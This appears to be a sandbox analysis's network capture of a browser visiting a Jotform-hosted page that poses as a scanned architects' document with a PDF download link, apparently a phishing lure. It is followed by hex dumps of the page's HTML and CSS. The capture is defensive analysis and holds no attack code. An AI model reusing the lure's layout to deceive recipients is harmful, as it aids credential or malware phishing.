                                                                                                                                                                                                                                            Jan 10, 2025 13:37:53.342710018 CET1.1.1.1192.168.2.170x673cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:53.342710018 CET1.1.1.1192.168.2.170x673cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:53.342710018 CET1.1.1.1192.168.2.170x673cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:53.342710018 CET1.1.1.1192.168.2.170x673cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:54.809791088 CET1.1.1.1192.168.2.170xa56bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:54.812261105 CET1.1.1.1192.168.2.170x2042No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:54.812261105 CET1.1.1.1192.168.2.170x2042No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:56.391057968 CET1.1.1.1192.168.2.170x6a80No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:56.391057968 CET1.1.1.1192.168.2.170x6a80No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:56.391330957 CET1.1.1.1192.168.2.170xe6eaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:58.387437105 CET1.1.1.1192.168.2.170x9f37No error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:58.388166904 CET1.1.1.1192.168.2.170xb760No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.1749703104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:54 UTC676OUTGET /app/250092704521347 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            jf-trace-id: b063f6b509c4bfa6
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:35:55 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; expires=Sun, 09 Feb 2025 12:35:55 GMT; Max-Age=2592000; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC78INData Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 35 61 62 63 63 37 37 66 35 66 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8ffcb5abcc77f5f8-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 33 36 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65
                                                                                                                                                                                                                                            Data Ascii: 36b2<!doctype html><html lang="en-US"> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,initial-scale
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 61 74 63 68 4d 65 64 69 61 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 75 70 64 61 74 65 46 61 76 69 63 6f 6e 28 64 61 72 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 63 6f 6e 20 3d 20 64 61 72 6b 20 3f 20 27 66 61 76 69 63 6f 6e 2d 32 30 32 31 2d 64 61 72 6b 2e 70 6e 67 27 20 3a 20 27 66 61 76 69 63 6f 6e 2d 32 30 32 31 2d 6c 69 67 68 74 2e 70 6e 67 27 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6c 69 6e 6b 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 5b 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 5d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6c 69 6e 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a
                                                                                                                                                                                                                                            Data Ascii: atchMedia) { function updateFavicon(dark) { var icon = dark ? 'favicon-2021-dark.png' : 'favicon-2021-light.png'; var link = document.querySelector('[rel="shortcut icon"]'); if (link) { link.href = 'https:
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 69 74 65 63 74 73 20 4c 74 64 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 0a 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 74 66 6f 72 6d 20 41 70 70 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 2f 66 6f 72 6d 5f 66 69 6c 65 73 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34
                                                                                                                                                                                                                                            Data Ascii: itects Ltd"/><meta property="og:description" content="Scanned From : MPD609"/><meta property="og:site_name" content="Jotform Apps"/><link rel="apple-touch-icon" sizes="180x180" href="https://eu.jotform.com/uploads/Gittens_Murray/form_files/25009270452134
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 2f 66 6f 72 6d 5f 66 69 6c 65 73 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 22 20 2f 3e 3c 21 2d 2d 20 4d 61 6e 69 66 65 73 74 2e 6a 73 6f 6e 20 20 2d 2d 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 61 70 70 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 6f 6e 22 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 20 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 30 32 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 2f 76 65 6e
                                                                                                                                                                                                                                            Data Ascii: jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png" />... Manifest.json --><link href="/app/250092704521347/manifest.json" rel="manifest" crossorigin="use-credentials" /><script src="https://cdn02.jotfor.ms/s/ven
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 30 32 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 2f 70 6f 72 74 61 6c 2f 36 37 34 61 63 31 34 34 31 31 65 2f 73 74 61 74 69 63 2f 63 73 73 2f 69 6e 64 65 78 2e 35 30 34 38 65 36 38 30 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 73 74 79 6c 65 62 75 69 6c 64 65 72 2f 73 74 61 74 69 63 2f 64 6f 6e 61 74 69 6f 6e 42 6f 78 2e 63 73 73 3f 76 3d 33 66 66 39 64 33 65 0a 22 3e 0a 20 20 20 20 3c
                                                                                                                                                                                                                                            Data Ascii: " rel="stylesheet"> <link href="https://cdn02.jotfor.ms/s/portal/674ac14411e/static/css/index.5048e680.css" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="https://cdn.jotfor.ms/stylebuilder/static/donationBox.css?v=3ff9d3e"> <
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 46 41 55 4c 54 22 2c 22 61 70 70 4c 6f 67 6f 53 69 7a 65 22 3a 22 33 33 22 2c 22 61 70 70 50 72 69 6d 61 72 79 46 6f 6e 74 43 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 61 70 70 56 65 72 73 69 6f 6e 22 3a 22 31 22 2c 22 62 6f 74 74 6f 6d 4e 61 76 69 67 61 74 69 6f 6e 50 72 65 66 65 72 65 6e 63 65 22 3a 22 61 75 74 6f 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 64 69 73 61 62 6c 65 64 41 70 70 54 65 78 74 22 3a 22 54 68 69 73 20 61 70 70 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 22 2c 22 64 69 73 61 62 6c 65 44 61 74 65 22 3a 22 22 2c 22 64 69 73 61 62 6c 65 44 61 74 65 54 69 6d 65 7a 6f 6e 65 22 3a 22 22 2c 22 64 69 73 61 62 6c
                                                                                                                                                                                                                                            Data Ascii: FAULT","appLogoSize":"33","appPrimaryFontColor":"#0A1551","appVersion":"1","bottomNavigationPreference":"auto","description":"Scanned From : MPD609\n","disabledAppText":"This app is currently unavailable.","disableDate":"","disableDateTimezone":"","disabl
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 52 4c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f 72 6d 5f 66 69 6c 65 73 5c 2f 44 4f 57 4e 4c 4f 41 44 25 32 30 47 49 54 54 45 4e 53 25 32 30 4d 55 52 52 41 59 53 25 32 30 41 52 43 48 49 54 45 43 54 53 2e 36 37 38 31 30 31 31 32 30 36 31 38 62 34 2e 34 31 31 39 32 35 32 39 2e 70 64 66 22 2c 22 69 74 65 6d 42 67 43 6f 6c 6f 72 22 3a 22 23 66 66 66 66 66 66 22 2c 22 69 74 65 6d 42 67 55 52 4c 22 3a 22 22 2c 22 69 74 65 6d 42 6f 72 64 65 72 43 6f 6c 6f 72 22 3a 22 23 44 33 44 43 45 46 22 2c 22 69 74 65 6d 46 6f 6e 74 43 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 74 65 6d 49 63 6f 6e 22 3a 22 22 2c 22 69 74 65 6d 49 63 6f
                                                                                                                                                                                                                                            Data Ascii: RL":"https:\/\/www.jotform.com\/uploads\/Gittens_Murray\/form_files\/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf","itemBgColor":"#ffffff","itemBgURL":"","itemBorderColor":"#D3DCEF","itemFontColor":"#0A1551","itemIcon":"","itemIco
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 75 6c 6c 2c 22 72 65 67 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 69 73 5f 76 65 72 69 66 69 65 64 22 3a 6e 75 6c 6c 2c 22 63 61 6d 70 61 69 67 6e 22 3a 7b 22 73 74 61 74 75 73 22 3a 66 61 6c 73 65 2c 22 74 79 70 65 22 3a 22 45 4f 59 22 2c 22 61 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 74 72 75 65 2c 22 61 73 73 65 74 73 56 65 72 73 69 6f 6e 22 3a 22 76 31 22 2c 22 75 74 6d 5f 63 61 6d 70 61 69 67 6e 22 3a 22 65 6f 79 32 30 32 34 22 2c 22 6c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 77 69 6e 64 6f 77 73 54 65 61 6d 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 73 61 6c 65 73 66 6f 72 63 65 4c 61 75 6e 63 68 41 73 73 65 74 73 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73
                                                                                                                                                                                                                                            Data Ascii: ull,"region":null,"is_verified":null,"campaign":{"status":false,"type":"EOY","assetsAvailable":true,"assetsVersion":"v1","utm_campaign":"eoy2024","launchAssetsAvailable":false,"windowsTeamLaunchAssetsAvailable":false,"salesforceLaunchAssetsAvailable":fals
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 74 72 75 65 2c 22 69 73 50 6f 72 74 61 6c 55 73 65 72 4d 61 6e 61 67 65 6d 65 6e 74 42 65 74 61 55 73 65 72 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 61 6c 6c 6f 77 41 49 41 67 65 6e 74 46 6f 72 6d 46 69 6c 6c 65 72 22 3a 66 61 6c 73 65 2c 22 61 69 41 67 65 6e 74 42 65 74 61 55 73 65 72 22 3a 66 61 6c 73 65 2c 22 61 6c 6c 6f 77 50 61 79 6d 65 6e 74 52 65 75 73 61 62 6c 65 46 6f 72 45 6e 74 65 72 70 72 69 73 65 22 3a 66 61 6c 73 65 2c 22 61 69 53 75 70 70 6f 72 74 41 67 65 6e 74 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 73 4e 65 77 46 6f 6c 64 65 72 53 74 72 75 63 74 75 72 65 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 69 73 4e 65 77 46 6f 72 6d 54 72 61 6e 73 66 65 72 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 74 65 61 6d 73 42
                                                                                                                                                                                                                                            Data Ascii: true,"isPortalUserManagementBetaUserEnabled":true,"allowAIAgentFormFiller":false,"aiAgentBetaUser":false,"allowPaymentReusableForEnterprise":false,"aiSupportAgentEnabled":false,"isNewFolderStructureAvailable":false,"isNewFormTransferEnabled":false,"teamsB


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.1749710104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC576OUTGET /s/portal/674ac14411e/static/css/8953.c2dbea13.css HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC421INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 41137
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:15 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "eb0b91383091d8d0834a4d80e170dc34"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 258
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b26c8c8ccc-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC948INData Raw: 3a 72 6f 6f 74 7b 2d 2d 74 61 67 69 66 79 2d 64 64 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 3a 23 33 35 39 35 66 36 3b 2d 2d 74 61 67 69 66 79 2d 64 64 2d 62 67 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 7d 2e 74 61 67 69 66 79 7b 2d 2d 74 61 67 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 64 64 3b 2d 2d 74 61 67 73 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 2d 2d 74 61 67 73 2d 66 6f 63 75 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 35 39 35 66 36 3b 2d 2d 74 61 67 2d 62 67 3a 23 65 35 65 35 65 35 3b 2d 2d 74 61 67 2d 68 6f 76 65 72 3a 23 64 33 65 32 65 32 3b 2d 2d 74 61 67 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 2d 2d 74 61 67 2d 74 65 78 74 2d 63 6f 6c 6f 72 2d 2d 65 64 69 74 3a 62 6c 61 63 6b 3b 2d
                                                                                                                                                                                                                                            Data Ascii: :root{--tagify-dd-color-primary:#3595f6;--tagify-dd-bg-color:white}.tagify{--tags-border-color:#ddd;--tags-hover-border-color:#ccc;--tags-focus-border-color:#3595f6;--tag-bg:#e5e5e5;--tag-hover:#d3e2e2;--tag-text-color:black;--tag-text-color--edit:black;-
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 2e 32 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 4c 6f 61 64 65 72 7b 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e 29 7d 7d 2e 74 61 67 69 66 79 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 61 67 73 2d 68 6f 76 65 72 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 7d 2e 74 61 67 69 66 79 2e 74 61 67 69 66 79 2d 2d 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 35 39 35 66 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 61 67 73 2d 66 6f 63 75 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 7d 2e 74 61 67 69 66 79 5b 72 65 61 64 6f 6e 6c 79 5d 3a 6e 6f
                                                                                                                                                                                                                                            Data Ascii: .2)}}@keyframes rotateLoader{to{transform:rotate(1turn)}}.tagify:hover{border-color:#ccc;border-color:var(--tags-hover-border-color)}.tagify.tagify--focus{border-color:#3595f6;border-color:var(--tags-focus-border-color);transition:all}.tagify[readonly]:no
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 78 20 30 20 35 70 78 20 35 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 31 33 73 20 65 61 73 65 2d 6f 75 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 74 61 67 69 66 79 5f 5f 74 61 67 3e 64 69 76 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 2e 33 65 6d 20 2e 35 65 6d 3b 70 61 64 64 69 6e 67 3a 76 61 72 28 2d 2d 74 61 67 2d 70 61 64 2c 2e 33 65 6d 20 2e 35 65 6d 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 74 61 67 2d 74 65 78 74 2d 63 6f 6c 6f 72 2c 23 30 30 30 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74
                                                                                                                                                                                                                                            Data Ascii: x 0 5px 5px;transition:all .13s ease-out;display:inline-flex;position:relative}.tagify__tag>div{vertical-align:top;box-sizing:border-box;max-width:100%;padding:.3em .5em;padding:var(--tag-pad,.3em .5em);color:var(--tag-text-color,#000);line-height:inherit
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 6e 67 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 74 61 67 69 66 79 5f 5f 74 61 67 2d 2d 6c 6f 61 64 69 6e 67 20 2e 74 61 67 69 66 79 5f 5f 74 61 67 5f 5f 72 65 6d 6f 76 65 42 74 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 74 61 67 69 66 79 5f 5f 74 61 67 2d 2d 6c 6f 61 64 69 6e 67 3a 61 66 74 65 72 7b 2d 2d 6c 6f 61 64 65 72 2d 73 69 7a 65 3a 2e 34 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6f 70 61 63 69 74 79 3a 31 3b 77 69 64 74 68 3a 2e 37 65 6d 3b 68 65 69 67 68 74 3a 2e 37 65 6d 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 6c 6f 61 64 65 72 2d 73 69 7a 65 29 3b 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 6c 6f 61 64 65 72 2d 73 69 7a 65 29 3b 62 6f 72 64 65 72 3a 33 70
                                                                                                                                                                                                                                            Data Ascii: ng{pointer-events:none}.tagify__tag--loading .tagify__tag__removeBtn{display:none}.tagify__tag--loading:after{--loader-size:.4em;content:"";vertical-align:middle;opacity:1;width:.7em;height:.7em;width:var(--loader-size);height:var(--loader-size);border:3p
